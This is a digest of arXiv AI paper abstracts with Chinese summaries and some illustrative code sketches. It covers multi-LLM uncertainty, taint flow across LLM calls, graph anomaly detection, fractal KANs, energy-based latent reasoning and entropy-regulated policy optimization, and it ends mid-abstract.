【速读】:该论文旨在解决多大语言模型(Large Language Model, LLM)系统中不确定性估计的局限性问题,即现有方法主要关注单个模型内部的不确定性,而未能有效捕捉不同模型之间的语义分歧。其解决方案的关键在于提出一种名为协同熵(Collaborative Entropy, CoE)的统一信息论度量指标,该指标定义在共享的语义聚类空间上,融合了模型内语义熵(intra-model semantic entropy)与模型间对集成均值的差异性(inter-model divergence),从而实现对多LLM协作过程中系统级不确定性(system-level uncertainty)的量化,特别强调协作置信度与模型间分歧的刻画。
链接: https://arxiv.org/abs/2603.28360
作者: Kangkang Sun,Jun Wu,Jianhua Li,Minyi Guo,Xiuzhen Che,Jianwei Huang
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 18 pages, 7 figures, has already published in ICLR workshop “Agentic AI in the Wild: From Hallucinations to Reliable Autonomy”
Abstract:Uncertainty estimation in multi-LLM systems remains largely single-model-centric: existing methods quantify uncertainty within each model but do not adequately capture semantic disagreement across models. To address this gap, we propose Collaborative Entropy (CoE), a unified information-theoretic metric for semantic uncertainty in multi-LLM collaboration. CoE is defined on a shared semantic cluster space and combines two components: intra-model semantic entropy and inter-model divergence to the ensemble mean. CoE is not a weighted ensemble predictor; it is a system-level uncertainty measure that characterizes collaborative confidence and disagreement. We analyze several core properties of CoE, including non-negativity, zero-value certainty under perfect semantic consensus, and the behavior of CoE when individual models collapse to delta distributions. These results clarify when reducing per-model uncertainty is sufficient and when residual inter-model disagreement remains. We also present a simple CoE-guided, training-free post-hoc coordination heuristic as a practical application of the metric. Experiments on TriviaQA and SQuAD with LLaMA-3.1-8B-Instruct, Qwen-2.5-7B-Instruct, and Mistral-7B-Instruct show that CoE provides stronger uncertainty estimation than standard entropy- and divergence-based baselines, with gains becoming larger as additional heterogeneous models are introduced. Overall, CoE offers a useful uncertainty-aware perspective on multi-LLM collaboration.
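按摘要的描述,CoE 在共享语义聚类空间上由两个分量组成:模型内语义熵与模型间对集成均值的散度。下面给出一个极简的 NumPy 示意草图(权重 lam、KL 形式的散度等均为本文为演示所作的假设,并非论文官方实现),可以直观验证"完全语义共识时为零、坍缩到不同 delta 分布时仍为正"这两条性质:

```python
import numpy as np

def semantic_entropy(p):
    """单个模型在语义聚类上的 Shannon 熵(忽略零概率簇)。"""
    p = np.asarray(p, dtype=float)
    nz = p[p > 0]
    return float(-np.sum(nz * np.log(nz)))

def collaborative_entropy(cluster_dists, lam=1.0):
    """示意版 CoE:模型内平均语义熵 + 各模型对集成均值的平均 KL 散度。
    lam 与 KL 形式均为假设,仅用于演示指标的两个分量。"""
    P = np.asarray(cluster_dists, dtype=float)
    mean = P.mean(axis=0)
    intra = float(np.mean([semantic_entropy(p) for p in P]))
    eps = 1e-12
    inter = float(np.mean([np.sum(p * np.log((p + eps) / (mean + eps))) for p in P]))
    return intra + lam * inter

# 完全语义共识:两个分量都为零
print(collaborative_entropy([[1.0, 0.0], [1.0, 0.0]]))  # → 0.0
# 坍缩到不同 delta 分布:模型内熵为 0,但模型间分歧仍被捕捉
print(collaborative_entropy([[1.0, 0.0], [0.0, 1.0]]) > 0)  # → True
```

第二个例子正对应摘要强调的情形:仅降低单模型不确定性并不足够,残余的模型间分歧需要系统级指标来刻画。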
[AI-31] Crossing the NL/PL Divide: Information Flow Analysis Across the NL/PL Boundary in LLM-Integrated Code
【速读】:该论文旨在解决大语言模型(Large Language Model, LLM)API调用在程序分析中引入的“自然语言/编程语言(NL/PL)边界”问题,即现有程序分析技术(如污点传播、依赖分析、代码切片等)无法跨过LLM调用边界追踪数据流,因为输入到LLM的运行时值经由自然语言提示后,在模型内部进行黑盒处理,并以代码、SQL、JSON或文本等形式输出,导致传统基于数据流摘要的分析失效。解决方案的关键在于提出首个信息流方法来跨越该边界:基于定量信息流理论构建了一个包含24个标签的分类体系,沿“信息保留程度”(从词法保留到完全阻断)和“输出模态”(自然语言、结构化格式、可执行产物)两个正交维度对LLM输出行为进行标注;通过标注9,083个占位符-输出对验证其可靠性和覆盖率,并进一步在污点传播和反向切片两个下游任务中证明该分类体系的有效性——实现了F₁=0.923的精确率与召回率,并显著减少无传播占位符引起的冗余切片。
链接: https://arxiv.org/abs/2603.28345
作者: Zihao Xu,Xiao Cheng,Ruijie Meng,Yuekang Li
机构: 未知
类目: Software Engineering (cs.SE); Artificial Intelligence (cs.AI)
备注:
Abstract:LLM API calls are becoming a ubiquitous program construct, yet they create a boundary that no existing program analysis can cross: runtime values enter a natural-language prompt, undergo opaque processing inside the LLM, and re-emerge as code, SQL, JSON, or text that the program consumes. Every analysis that tracks data across function boundaries, including taint analysis, program slicing, dependency analysis, and change-impact analysis, relies on dataflow summaries of callee behavior. LLM calls have no such summaries, breaking all of these analyses at what we call the NL/PL boundary. We present the first information flow method to bridge this boundary. Grounded in quantitative information flow theory, our taxonomy defines 24 labels along two orthogonal dimensions: information preservation level (from lexically preserved to fully blocked) and output modality (natural language, structured format, executable artifact). We label 9,083 placeholder-output pairs from 4,154 real-world Python files and validate reliability with Cohen’s \kappa = 0.82 and near-complete coverage (0.01% unclassifiable). We demonstrate the taxonomy’s utility on two downstream applications: (1) a two-stage taint propagation pipeline combining taxonomy-based filtering with LLM verification achieves F_1 = 0.923 on 353 expert-annotated pairs, with cross-language validation on six real-world OpenClaw prompt injection cases further confirming effectiveness; (2) taxonomy-informed backward slicing reduces slice size by a mean of 15% in files containing non-propagating placeholders. Per-label analysis reveals that four blocked labels account for nearly all non-propagating cases, providing actionable filtering criteria for tool builders.
[AI-32] A Multi-Agent Rhizomatic Pipeline for Non-Linear Literature Analysis
【速读】:该论文旨在解决社会科学研究中系统性文献综述普遍依赖树状逻辑(arborescent logics)所带来的局限性,即通过层级关键词筛选、线性筛选和分类法难以捕捉复杂研究领域中的横向关联、断裂点与涌现模式。其解决方案的关键在于构建一个基于德勒兹过程关系本体论的多智能体计算管道——Rhizomatic Research Agent (V3),该系统通过12个专业化代理在七阶段架构中协同运作,将“根茎”(rhizome)的六个核心原则——连接、异质性、多元性、无意义断裂、制图学和拓印——转化为自动化流程,整合大语言模型(LLM)编排、OpenAlex与arXiv双源语料摄入、SciBERT语义地形分析及动态断裂检测协议,从而实现非线性知识映射,有效识别跨学科交汇点与传统方法忽略的结构性研究空白。
链接: https://arxiv.org/abs/2603.28336
作者: Julio C. Serrano, Joonas Kevari, Rumy Narayan
机构: 未知
类目: Artificial Intelligence (cs.AI); Machine Learning (cs.LG)
备注: Research note paper, 12 pages, 1 figure, 2 tables
Abstract:Systematic literature reviews in the social sciences overwhelmingly follow arborescent logics – hierarchical keyword filtering, linear screening, and taxonomic classification – that suppress the lateral connections, ruptures, and emergent patterns characteristic of complex research landscapes. This research note presents the Rhizomatic Research Agent (V3), a multi-agent computational pipeline grounded in Deleuzian process-relational ontology, designed to conduct non-linear literature analysis through 12 specialized agents operating across a seven-phase architecture. The system was developed in response to the methodological groundwork established by Narayan (2023), who employed rhizomatic inquiry in her doctoral research on sustainable energy transitions but relied on manual, researcher-driven exploration. The Rhizomatic Research Agent operationalizes the six principles of the rhizome – connection, heterogeneity, multiplicity, asignifying rupture, cartography, and decalcomania – into an automated pipeline integrating large language model (LLM) orchestration, dual-source corpus ingestion from OpenAlex and arXiv, SciBERT semantic topography, and dynamic rupture detection protocols. Preliminary deployment demonstrates the system’s capacity to surface cross-disciplinary convergences and structural research gaps that conventional review methods systematically overlook. The pipeline is open-source and extensible to any phenomenon zone where non-linear knowledge mapping is required.
[AI-33] Building evidence-based knowledge graphs from full-text literature for disease-specific biomedical reasoning
【速读】:该论文旨在解决生物医学知识资源中证据信息表达不充分的问题,即现有资源要么以非结构化文本形式保存证据,要么将其压缩为扁平三元组而丢失研究设计、溯源信息和定量支持。解决方案的关键在于提出EvidenceNet框架及其配套数据集,通过大语言模型(Large Language Model, LLM)辅助的流水线,从全文文献中提取实验依据明确的结构化证据节点,对生物医学实体进行标准化、评估证据质量,并通过类型化的语义关系连接证据记录,从而构建疾病特异性的知识图谱。该方法在技术验证中展现出高精度的字段级抽取(98.3%)、实体链接准确率(100.0%)及语义关系分类准确率(90.0%),并显著提升检索增强型问答性能,保留可用于未来链接预测与靶点优先排序的结构信号。
链接: https://arxiv.org/abs/2603.28325
作者: Chang Zong,Sicheng Lv,Si-tu Xue,Huilin Zheng,Jian Wan,Lei Zhang
机构: 未知
类目: Computational Engineering, Finance, and Science (cs.CE); Artificial Intelligence (cs.AI)
备注: 30 pages, 5 figures, 12 tables
Abstract:Biomedical knowledge resources often either preserve evidence as unstructured text or compress it into flat triples that omit study design, provenance, and quantitative support. Here we present EvidenceNet, a framework and dataset for building disease-specific knowledge graphs from full-text biomedical literature. EvidenceNet uses a large language model (LLM)-assisted pipeline to extract experimentally grounded findings as structured evidence nodes, normalize biomedical entities, score evidence quality, and connect evidence records through typed semantic relations. We release two resources: EvidenceNet-HCC with 7,872 evidence records, 10,328 graph nodes, and 49,756 edges, and EvidenceNet-CRC with 6,622 records, 8,795 nodes, and 39,361 edges. Technical validation shows high component fidelity, including 98.3% field-level extraction accuracy, 100.0% high-confidence entity-link accuracy, 87.5% fusion integrity, and 90.0% semantic relation-type accuracy. In downstream evaluation, EvidenceNet improves internal and external retrieval-augmented question answering and retains structural signal for future link prediction and target prioritization. These results establish EvidenceNet as a disease-specific resource for evidence-aware biomedical reasoning and hypothesis generation.
[AI-34] Mapping data literacy trajectories in K-12 education
【速读】:该论文旨在解决K-12教育中数据素养(data literacy)培养的系统性问题,尤其关注学习者如何从传统规则驱动编程向数据驱动系统理解转变的挑战。其核心解决方案是提出一个“数据范式框架”(data paradigms framework),该框架基于两个维度对学习活动进行分类:逻辑类型(知识驱动或数据驱动系统)与可解释性(透明或黑箱模型)。在此基础上,进一步引入“学习轨迹”(learning trajectories)概念,可视化学习者在不同数据范式间的迁移路径,并识别出四种典型的学习路径,为教育设计者提供理论依据,以优化跨学科、跨情境的数据素养教学环境构建。
链接: https://arxiv.org/abs/2603.28317
作者: Robert Whyte,Manni Cheung,Katharine Childs,Jane Waite,Sue Sentance
机构: 未知
类目: Computers and Society (cs.CY); Artificial Intelligence (cs.AI)
备注: Presented at the Data Literacy for the 21st Century: Perspectives from Visualization, Cognitive Science, Artificial Intelligence, and Education CHI '26 workshop
Abstract:Data literacy skills are fundamental in computer science education. However, understanding how data-driven systems work represents a paradigm shift from traditional rule-based programming. We conducted a systematic literature review of 84 studies to understand K-12 learners’ engagement with data across disciplines and contexts. We propose the data paradigms framework that categorises learning activities along two dimensions: (i) logic (knowledge-based or data-driven systems), and (ii) explainability (transparent or opaque models). We further apply the notion of learning trajectories to visualize the pathways learners follow across these distinct paradigms. We detail four distinct trajectories as a provocation for researchers and educators to reflect on how the notion of data literacy varies depending on the learning context. We suggest these trajectories could be useful to those concerned with the design of data literacy learning environments within and beyond CS education.
[AI-35] NeiGAD: Augmenting Graph Anomaly Detection via Spectral Neighbor Information
【速读】:该论文旨在解决图异常检测(Graph Anomaly Detection, GAD)中邻居信息建模不足的问题,即现有基于图神经网络(GNN)的方法虽通过消息传递机制利用邻居信息,但未能显式刻画邻居结构连通性与属性一致性之间的交互作用,从而限制了检测性能。其解决方案的关键在于提出一种名为NeiGAD的可插拔模块,该模块基于谱图分析(spectral graph analysis)提取邻接矩阵的特征向量,理论证明这些特征向量能够编码局部邻居交互并逐步放大异常信号;进而通过选择一组紧凑的特征向量构建高效且判别性强的表示,实现对异常节点或结构的精准识别。
链接: https://arxiv.org/abs/2603.28300
作者: Qing Qing,Huafei Huang,Mingliang Hou,Renqiang Luo,Mohsen Guizani
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 6 pages, IWCMC 2026 accepted
Abstract:Graph anomaly detection (GAD) aims to identify irregular nodes or structures in attributed graphs. Neighbor information, which reflects both structural connectivity and attribute consistency with surrounding nodes, is essential for distinguishing anomalies from normal patterns. Although recent graph neural network (GNN)-based methods incorporate such information through message passing, they often fail to explicitly model its effect or interaction with attributes, limiting detection performance. This work introduces NeiGAD, a novel plug-and-play module that captures neighbor information through spectral graph analysis. Theoretical insights demonstrate that eigenvectors of the adjacency matrix encode local neighbor interactions and progressively amplify anomaly signals. Based on this, NeiGAD selects a compact set of eigenvectors to construct efficient and discriminative representations. Experiments on eight real-world datasets show that NeiGAD consistently improves detection accuracy and outperforms state-of-the-art GAD methods. These results demonstrate the importance of explicit neighbor modeling and the effectiveness of spectral analysis in anomaly detection. Code is available at: this https URL.
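摘要指出,邻接矩阵的特征向量能够编码局部邻居交互,NeiGAD 据此选取一组紧凑的特征向量来构造判别表示。下面用 NumPy 给出一个示意草图:打分方式(低秩谱重构残差)是谱图分析中常见的异常检测启发式,并非 NeiGAD 的实际算法,仅用于演示"谱分解 → 选取 k 个主特征对 → 按节点打分"的基本流程:

```python
import numpy as np

def spectral_anomaly_scores(A, k):
    """基于邻接矩阵前 k 个主特征向量的低秩重构残差,按节点打分(示意)。"""
    A = np.asarray(A, dtype=float)
    vals, vecs = np.linalg.eigh(A)            # 对称邻接矩阵的谱分解
    keep = np.argsort(-np.abs(vals))[:k]      # 保留 k 个绝对值最大的特征对
    Uk, lk = vecs[:, keep], vals[keep]
    residual = A - Uk @ np.diag(lk) @ Uk.T    # 低秩近似无法解释的结构
    return np.linalg.norm(residual, axis=1)   # 每个节点一行残差范数

# 玩具图:两个三角形社区 + 一个横跨两社区的桥节点(节点 6)
edges = [(0, 1), (1, 2), (0, 2), (3, 4), (4, 5), (3, 5), (6, 0), (6, 3)]
n = 7
A = np.zeros((n, n))
for i, j in edges:
    A[i, j] = A[j, i] = 1.0
scores = spectral_anomaly_scores(A, k=2)
```

当 k 取满秩时重构是精确的、残差趋近于零;紧凑的 k 才会把"主流结构解释不了的节点"凸显出来,这正是摘要所说以紧凑特征向量集合换取判别性的直观含义。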
[AI-36] Evaluating LLM s for Answering Student Questions in Introductory Programming Courses
【速读】:该论文旨在解决生成式 AI(Generative AI)在编程教育中应用时面临的双重挑战:一方面,学生直接使用生成式 AI 工具获取完整代码解答,削弱了学习过程中的认知建构;另一方面,教师难以高效提供及时且个性化的反馈,导致教学 scalability 问题。解决方案的关键在于构建一个任务无关的、可复现的评估框架,通过采集来自真实学习管理系统中的 170 条学生提问及其专家标注的参考答案,开发并验证了一个基于 LLM-as-a-Judge 的定制化评分指标,以量化评估 LLM 输出的教学准确性。研究发现,如 Gemini 3 flash 等模型可超越典型教师回答的质量基准,但为防止幻觉和确保课程上下文一致性,必须采用“教师在环”(teacher-in-the-loop)机制进行干预与校准,从而推动教育类大语言模型从后置测试向前置量化验证的范式转变。
链接: https://arxiv.org/abs/2603.28295
作者: Thomas Van Mullem,Bart Mesuere,Peter Dawyndt
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注:
Abstract:The rapid emergence of Large Language Models (LLMs) presents both opportunities and challenges for programming education. While students increasingly use generative AI tools, direct access often hinders the learning process by providing complete solutions rather than pedagogical hints. Concurrently, educators face significant workload and scalability challenges when providing timely, personalized feedback. This study investigates the capabilities of LLMs to safely and effectively assist educators in answering student questions within a CS1 programming course. To achieve this, we established a rigorous, reproducible evaluation process by curating a benchmark dataset of 170 authentic student questions from a learning management system, paired with ground-truth responses authored by subject matter experts. Because traditional text-matching metrics are insufficient for evaluating open-ended educational responses, we developed and validated a custom LLM-as-a-Judge metric optimized for assessing pedagogical accuracy. Our findings demonstrate that models, such as Gemini 3 flash, can surpass the quality baseline of typical educator responses, achieving high alignment with expert pedagogical standards. To mitigate persistent risks like hallucination and ensure alignment with course-specific context, we advocate for a “teacher-in-the-loop” implementation. Finally, we abstract our methodology into a task-agnostic evaluation framework, advocating for a shift in the development of educational LLM tools from ad-hoc, post-deployment testing to a quantifiable, pre-deployment validation process.
[AI-37] FI-KAN: Fractal Interpolation Kolmogorov-Arnold Networks
【速读】:该论文旨在解决Kolmogorov-Arnold Networks (KAN) 在非光滑函数逼近中缺乏内在多尺度分解的问题,从而限制了其在不同正则性(regularity)目标上的表达能力。解决方案的关键在于引入分形插值KAN(Fractal Interpolation KAN, FI-KAN),通过将迭代函数系统(Iterated Function System, IFS)理论中的可学习分形插值函数(Fractal Interpolation Function, FIF)基函数嵌入到KAN架构中,实现对目标函数正则性的自适应匹配:Pure FI-KAN完全替代B-spline基,Hybrid FI-KAN保留B-spline路径并添加可学习的分形修正项;同时,IFS收缩参数赋予每条边可微分的分形维数,在训练过程中动态调整以适应目标的局部正则性。实验表明,该方法在Holder正则性基准、分形目标及非光滑偏微分方程解上均显著优于传统KAN,且分形维数正则化器提供了可解释的复杂度控制机制,验证了“基函数几何结构需与目标正则性相匹配”的原则。
链接: https://arxiv.org/abs/2603.28288
作者: Gnankan Landry Regis N’guessan
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Numerical Analysis (math.NA)
备注: 37 pages, 20 figures, 14 tables. Code available at: this https URL
Abstract:Kolmogorov-Arnold Networks (KAN) employ B-spline bases on a fixed grid, providing no intrinsic multi-scale decomposition for non-smooth function approximation. We introduce Fractal Interpolation KAN (FI-KAN), which incorporates learnable fractal interpolation function (FIF) bases from iterated function system (IFS) theory into KAN. Two variants are presented: Pure FI-KAN (Barnsley, 1986) replaces B-splines entirely with FIF bases; Hybrid FI-KAN (Navascues, 2005) retains the B-spline path and adds a learnable fractal correction. The IFS contraction parameters give each edge a differentiable fractal dimension that adapts to target regularity during training. On a Holder regularity benchmark ( \alpha \in [0.2, 2.0] ), Hybrid FI-KAN outperforms KAN at every regularity level (1.3x to 33x). On fractal targets, FI-KAN achieves up to 6.3x MSE reduction over KAN, maintaining 4.7x advantage at 5 dB SNR. On non-smooth PDE solutions (scikit-fem), Hybrid FI-KAN achieves up to 79x improvement on rough-coefficient diffusion and 3.5x on L-shaped domain corner singularities. Pure FI-KAN’s complementary behavior, dominating on rough targets while underperforming on smooth ones, provides controlled evidence that basis geometry must match target regularity. A fractal dimension regularizer provides interpretable complexity control whose learned values recover the true fractal dimension of each target. These results establish regularity-matched basis design as a principled strategy for neural function approximation.
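FIF 基的出发点是 Barnsley (1986) 的迭代函数系统:每段仿射映射的系数由插值条件唯一确定,纵向缩放因子 d_i(|d_i| < 1)控制图像的粗糙度,对应文中每条边上可微的分形维数参数。下面是经典 FIF 吸引子构造的 NumPy 草图(确定性迭代版本,非论文中可学习的 FI-KAN 实现),其关键性质是吸引子严格穿过全部插值结点:

```python
import numpy as np

def fractal_interpolation(xs, ys, d, iters=6):
    """Barnsley IFS 的吸引子:插值 (xs, ys),d 为各段纵向缩放因子。"""
    xs, ys, d = map(np.asarray, (xs, ys, d))
    x0, xN, y0, yN = xs[0], xs[-1], ys[0], ys[-1]
    pts = np.stack([xs, ys], axis=1)          # 以结点集合作为初始点集
    for _ in range(iters):
        new = []
        for i in range(1, len(xs)):
            # L_i 把 [x0, xN] 映到 [x_{i-1}, x_i];F_i 满足端点插值条件
            a = (xs[i] - xs[i-1]) / (xN - x0)
            e = (xN * xs[i-1] - x0 * xs[i]) / (xN - x0)
            c = (ys[i] - ys[i-1] - d[i-1] * (yN - y0)) / (xN - x0)
            f = (xN * ys[i-1] - x0 * ys[i] - d[i-1] * (xN * y0 - x0 * yN)) / (xN - x0)
            new.append(np.stack([a * pts[:, 0] + e,
                                 c * pts[:, 0] + d[i-1] * pts[:, 1] + f], axis=1))
        pts = np.concatenate(new)             # 每轮迭代点数乘以段数
    return pts

pts = fractal_interpolation([0.0, 0.5, 1.0], [0.0, 1.0, 0.0], [0.3, 0.3], iters=5)
```

把 d_i 设为可学习参数并对其可微,正是 FI-KAN 让"分形维数随目标正则性自适应"的机制;d_i → 0 时 FIF 退化为分段线性插值,|d_i| 增大则图像越粗糙。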
[AI-38] Pre-Deployment Complexity Estimation for Federated Perception Systems
【速读】:该论文旨在解决边缘人工智能(Edge AI)系统中联邦学习(Federated Learning, FL)任务在部署前难以评估其学习复杂度的问题,具体表现为缺乏工具预测在隐私保护、资源受限环境下可达到的模型准确率与通信成本。解决方案的关键在于提出一个分类器无关的预部署框架,通过联合建模数据内在属性(如维度、稀疏性和异质性)与参与客户端的组成特征,构建一个综合的学习复杂度指标。该指标能够有效反映不同联邦配置下模型训练难度,并在MNIST和CIFAR数据集上的实验验证了其与联邦学习性能及达成固定准确率所需通信开销的高度相关性,从而为边缘感知系统的资源规划、数据评估和可行性分析提供实用诊断依据。
链接: https://arxiv.org/abs/2603.28282
作者: KMA Solaiman,Shafkat Islam,Ruy de Oliveira,Bharat Bhargava
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI); Distributed, Parallel, and Cluster Computing (cs.DC)
备注: Accepted and presented at Edge AI Research Symposium 2026 (EdgeAI2026), San Diego, CA
Abstract:Edge AI systems increasingly rely on federated learning to train perception models in distributed, privacy-preserving, and resource-constrained environments. Yet, before training begins, practitioners often lack practical tools to estimate how difficult a federated learning task will be in terms of achievable accuracy and communication cost. This paper presents a classifier-agnostic, pre-deployment framework for estimating learning complexity in federated perception systems by jointly modeling intrinsic properties of the data and characteristics of the distributed environment. The proposed complexity metric integrates dataset attributes such as dimensionality, sparsity, and heterogeneity with factors related to the composition of participating clients. Using federated learning as a representative distributed training setting, we examine how learning difficulty varies across different federated configurations. Experiments on multiple variants of the MNIST dataset and CIFAR dataset show that the proposed metric strongly correlates with federated learning performance and the communication effort required to reach fixed accuracy targets. These findings suggest that complexity estimation can serve as a practical diagnostic tool for resource planning, dataset assessment, and feasibility evaluation in edge-deployed perception systems.
[AI-39] MR-ImagenTime: Multi-Resolution Time Series Generation through Dual Image Representations
【速读】:该论文旨在解决时间序列预测中模型对固定长度输入的依赖性以及多尺度建模能力不足的问题。其解决方案的关键在于提出MR-CDM框架,该框架融合了分层多分辨率趋势分解(hierarchical multi-resolution trend decomposition)、适用于变长输入的自适应嵌入机制(adaptive embedding mechanism)以及多尺度条件扩散过程(multi-scale conditional diffusion process),从而实现更灵活且精准的多尺度时间序列建模与预测。
链接: https://arxiv.org/abs/2603.28253
作者: Xianyong Xu,Yuanjun Zuo,Zhihong Huang,Yihan Qin,Haoxian Xu,Leilei Du,Haotian Wang
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注:
Abstract:Time series forecasting is vital across many domains, yet existing models struggle with fixed-length inputs and inadequate multi-scale modeling. We propose MR-CDM, a framework combining hierarchical multi-resolution trend decomposition, an adaptive embedding mechanism for variable-length inputs, and a multi-scale conditional diffusion process. Evaluations on four real-world datasets demonstrate that MR-CDM significantly outperforms state-of-the-art baselines (e.g., CSDI, Informer), reducing MAE and RMSE by approximately 6-10%.
[AI-40] Reasoning as Energy Minimization over Structured Latent Trajectories
【速读】:该论文旨在解决传统单次神经解码器(single-shot neural decoders)缺乏迭代优化能力,而链式思维(chain-of-thought)方法虽具离散中间步骤却无标量推理进度度量的问题。其核心解决方案是提出基于能量的结构化潜空间规划(Energy-Based Reasoning via Structured Latent Planning, EBRM),将推理建模为在学习到的能量函数 $ E(h_x, z) $ 下对多步潜变量轨迹 $ z_{1:T} $ 进行梯度优化的过程。关键创新在于:能量函数分解为每步兼容性、转移一致性与轨迹平滑性三项,并通过监督编码器-解码器训练结合硬负样本对比能量塑造进行训练;推理阶段则沿潜空间执行梯度下降或Langevin动力学,最终从 $ z_T $ 解码结果。实验揭示了一个关键失败模式——潜空间规划导致CNF逻辑任务准确率由约95%降至约56%,源于训练时使用编码器输出 $ h_x $ 而评估时使用漂移至未见潜域的 $ z_T $ 所致的分布偏移,为此进一步提出双路径解码训练和潜锚定策略以缓解此问题。
链接: https://arxiv.org/abs/2603.28248
作者: David K. Johansson
机构: 未知
类目: Artificial Intelligence (cs.AI)
备注: 7 pages
Abstract:Single-shot neural decoders commit to answers without iterative refinement, while chain-of-thought methods introduce discrete intermediate steps but lack a scalar measure of reasoning progress. We propose Energy-Based Reasoning via Structured Latent Planning (EBRM), which models reasoning as gradient-based optimization of a multi-step latent trajectory z_1:T under a learned energy function E(h_x, z) . The energy decomposes into per-step compatibility, transition consistency, and trajectory smoothness terms. Training combines supervised encoder-decoder learning with contrastive energy shaping using hard negatives, while inference performs gradient descent or Langevin dynamics over z and decodes from z_T . We identify a critical failure mode: on CNF logic satisfaction, latent planning reduces accuracy from \approx 95% to \approx 56% . This degradation arises from a distribution mismatch, where the decoder is trained on encoder outputs h_x but evaluated on planner outputs z_T that drift into unseen latent regions. We analyze this behavior through per-step decoding, latent drift tracking, and gradient decomposition. To address it, we propose dual-path decoder training and latent anchoring. We further introduce a six-part ablation protocol covering component contributions, trajectory length, planner dynamics, initialization, decoder training distribution, and anchor weight. Experiments on three synthetic tasks show that energy decreases monotonically and induces structured latent trajectories on graph and logic tasks, while remaining flat on arithmetic ( r = 0.073 ), indicating a negative result. Code is available at this https URL.
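按摘要,EBRM 把推理建模为对轨迹 z_{1:T} 在学习到的能量 E(h_x, z) 下的梯度优化,能量分解为逐步兼容项、转移一致项与平滑项。下面用一个凸二次的示意能量(仅含兼容项与平滑项,省略转移项与 Langevin 噪声;上下文嵌入 h 为随机假设数据)复现摘要中"能量随推理迭代单调下降"的行为:

```python
import numpy as np

def energy(z, h, lam=0.5):
    """示意能量:每步与上下文嵌入 h 的兼容项 + 相邻步平滑项。"""
    return float(np.sum((z - h) ** 2) + lam * np.sum((z[1:] - z[:-1]) ** 2))

def plan(z0, h, lam=0.5, lr=0.1, steps=60):
    """对潜轨迹 z_{1:T} 做梯度下降(论文推理循环的简化版)。"""
    z = z0.copy()
    history = []
    for _ in range(steps):
        grad = 2.0 * (z - h)                 # 兼容项梯度
        diff = z[1:] - z[:-1]
        grad[1:] += 2.0 * lam * diff         # 平滑项对 z_{t+1} 的梯度
        grad[:-1] -= 2.0 * lam * diff        # 平滑项对 z_t 的梯度
        z = z - lr * grad
        history.append(energy(z, h, lam))
    return z, history

rng = np.random.default_rng(0)
z0 = rng.normal(size=(5, 3))   # T=5 步、3 维潜变量的初始轨迹
h = rng.normal(size=3)         # 假设的上下文嵌入 h_x
z_final, hist = plan(z0, h)
```

注意这个玩具能量的最优轨迹恰好整体收敛到 h 附近,也就是说优化后的 z_T 可能漂出解码器训练时见过的 h_x 分布之外,这正是摘要描述的分布失配失败模式的最小示例。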
[AI-41] An Optimal Battery-Free Approach for Emission Reduction by Storing Solar Surplus in Building Thermal Mass
【速读】:该论文旨在解决建筑脱碳过程中因依赖传统需求侧管理或电池储能所引发的碳排放忽视、电网过载及环境与成本问题。其解决方案的关键在于提出一种基于热质量(thermal mass)的碳感知优化控制策略,通过在舒适温度范围内动态调节室内设定温度来存储多余可再生能源,从而实现碳排放敏感型负荷转移,避免使用专用电池储能装置。该方法结合建筑能耗、太阳能发电和实时电网碳强度预测,在保障舒适度的同时显著降低电网电力消耗。
链接: https://arxiv.org/abs/2603.28217
作者: Michela Boffi,Jessica Leoni,Fabrizio Leonforte,Mara Tanelli,Paolo Oliaro
机构: 未知
类目: ystems and Control (eess.SY); Artificial Intelligence (cs.AI)
备注:
Abstract:Decarbonization in buildings calls for advanced control strategies that coordinate on-site renewables, grid electricity, and thermal demand. Literature approaches typically rely on demand side management strategies or on active energy storage, like batteries. However, the first solution often neglects carbon-aware objectives, and could lead to grid overload issues, while batteries entail environmental, end-of-life, and cost concerns. To overcome these limitations, we propose an optimal, carbon-aware optimization strategy that exploits the building’s thermal mass as a passive storage, avoiding dedicated batteries. Specifically, when a surplus of renewable energy is available, our strategy computes the optimal share of surplus to store by temporarily adjusting the indoor temperature setpoint within comfort bounds. Thus, by explicitly accounting for forecasts of building energy consumption, solar production, and time-varying grid carbon intensity, our strategy enables emissions-aware load shifting while maintaining comfort. We evaluate the approach by simulating three TRNSYS models of the same system with different thermal mass. In all cases, the results show consistent reductions in grid electricity consumption with respect to a baseline that does not leverage surplus renewable generation. These findings highlight the potential of thermal-mass-based control for building decarbonization.
[AI-42] ERPO: Token-Level Entropy-Regulated Policy Optimization for Large Reasoning Models
【速读】:该论文旨在解决标准Group Relative Policy Optimization (GRPO)在生成式AI(Generative AI)推理过程中因粗粒度优势分配导致的熵坍缩问题,即模型倾向于生成冗余且低质量的推理路径。其核心解决方案是提出Entropy-Regulated Policy Optimization (ERPO),关键在于将优化焦点从粗粒度序列层面转移到细粒度token动态层面:通过引入熵感知门控机制增强关键决策点(Critical Decision Pivots, CDPs)处的探索能力,利用基于桶的隐式归一化缓解难度偏差,并采用结果锚定的优势合成策略重构token级信号,从而显著提升推理准确率与路径简洁性。
链接: https://arxiv.org/abs/2603.28204
作者: Song Yu,Li Li
机构: 未知
类目: Machine Learning (cs.LG); Artificial Intelligence (cs.AI)
备注: 13 pages, 4 figures
Abstract:Reinforcement learning from verifiable rewards (RLVR) has significantly advanced the reasoning capabilities of large language models. However, standard Group Relative Policy Optimization (GRPO) typically assigns a uniform, sequence-level advantage to all tokens, thereby overlooking the intrinsic information heterogeneity along reasoning chains. We show that this coarse-grained credit assignment leads to premature entropy collapse and encourages the model to generate redundant, low-quality reasoning paths. Through systematic empirical analysis, we identify Critical Decision Pivots (CDPs): transient high-entropy states where the policy’s trajectory is most sensitive to perturbations. These pivots represent the “forks in the road” where effective multi-path exploration is most crucial yet often suppressed by uniform advantage signals. Building on these insights, we propose Entropy-Regulated Policy Optimization (ERPO), which transitions the optimization focus from coarse sequences to fine-grained token dynamics. ERPO introduces three synergistic components: (i) Entropy-aware Gating, which adaptively amplifies exploration at CDPs to facilitate diverse path discovery; (ii) Bucket-based Implicit Normalization, which mitigates difficulty bias by aligning token progress windows; and (iii) Result-anchored Advantage Synthesis, which re-weights token-level signals via outcome-driven anchors. Extensive experiments on competitive mathematical benchmarks (e.g., MATH, AIME) demonstrate that ERPO significantly outperforms GRPO. Notably, ERPO not only boosts reasoning accuracy but also yields significantly more concise and robust derivation paths, 